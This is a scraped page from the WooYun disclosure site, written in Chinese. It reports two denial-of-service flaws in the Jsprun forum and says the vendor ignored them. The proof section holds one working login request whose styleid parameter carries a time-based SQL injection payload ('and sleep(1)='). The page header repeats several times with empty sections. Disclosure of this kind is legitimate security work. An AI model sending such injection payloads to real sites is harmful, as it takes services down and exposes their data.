Jsprun 论坛函数型 DOS 漏洞 2 處 | wooyun-2012-011253| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-011253

漏洞标题：Jsprun 论坛函数型 DOS 漏洞 2 處

漏洞作者： insight-labs

提交时间：2012-08-24 07:32

修复时间：2012-10-08 07:33

公开时间：2012-10-08 07:33

漏洞类型：拒绝服务

危害等级：中

自评Rank：5

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2012-08-24：积极联系厂商并且等待厂商认领中，细节不对外公开
2012-10-08：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

Jsprun使用struts开发,分析几天代码
发现两处函数型DOS 先发给官方吧.因為還挺嚴重的
只要送一个请求,网站就死了

详细说明：

官方修复了之前的注入漏洞,但同时还存在着许多问题
例如 xss 就有很多
建议所有的输入都要过滤
后台的编辑模块可以直接写jsp代码
这是不靠谱的,建议改改

漏洞证明：

1.
/logging.jsp?action=login
answer=1&cookietime=86400&loginfield=username&loginmode=normal&password=acUn3t1x&questionid=0&referer=index.jsp&styleid=1' and sleep(1)='&username=t
2.發文的subject

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-011253

漏洞标题：Jsprun 论坛函数型 DOS 漏洞 2 處

相关厂商：飞速创想（北京）科技

漏洞作者： insight-labs

提交时间：2012-08-24 07:32

修复时间：2012-10-08 07:33

公开时间：2012-10-08 07:33

漏洞类型：拒绝服务

危害等级：中

自评Rank：5

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 insight-labs@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-011253

漏洞标题：Jsprun 论坛函数型 DOS 漏洞 2 處

相关厂商：飞速创想（北京）科技

漏洞作者： insight-labs

提交时间：2012-08-24 07:32

修复时间：2012-10-08 07:33

公开时间：2012-10-08 07:33

漏洞类型：拒绝服务

危害等级：中

自评Rank：5

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2012-011253"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 insight-labs@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：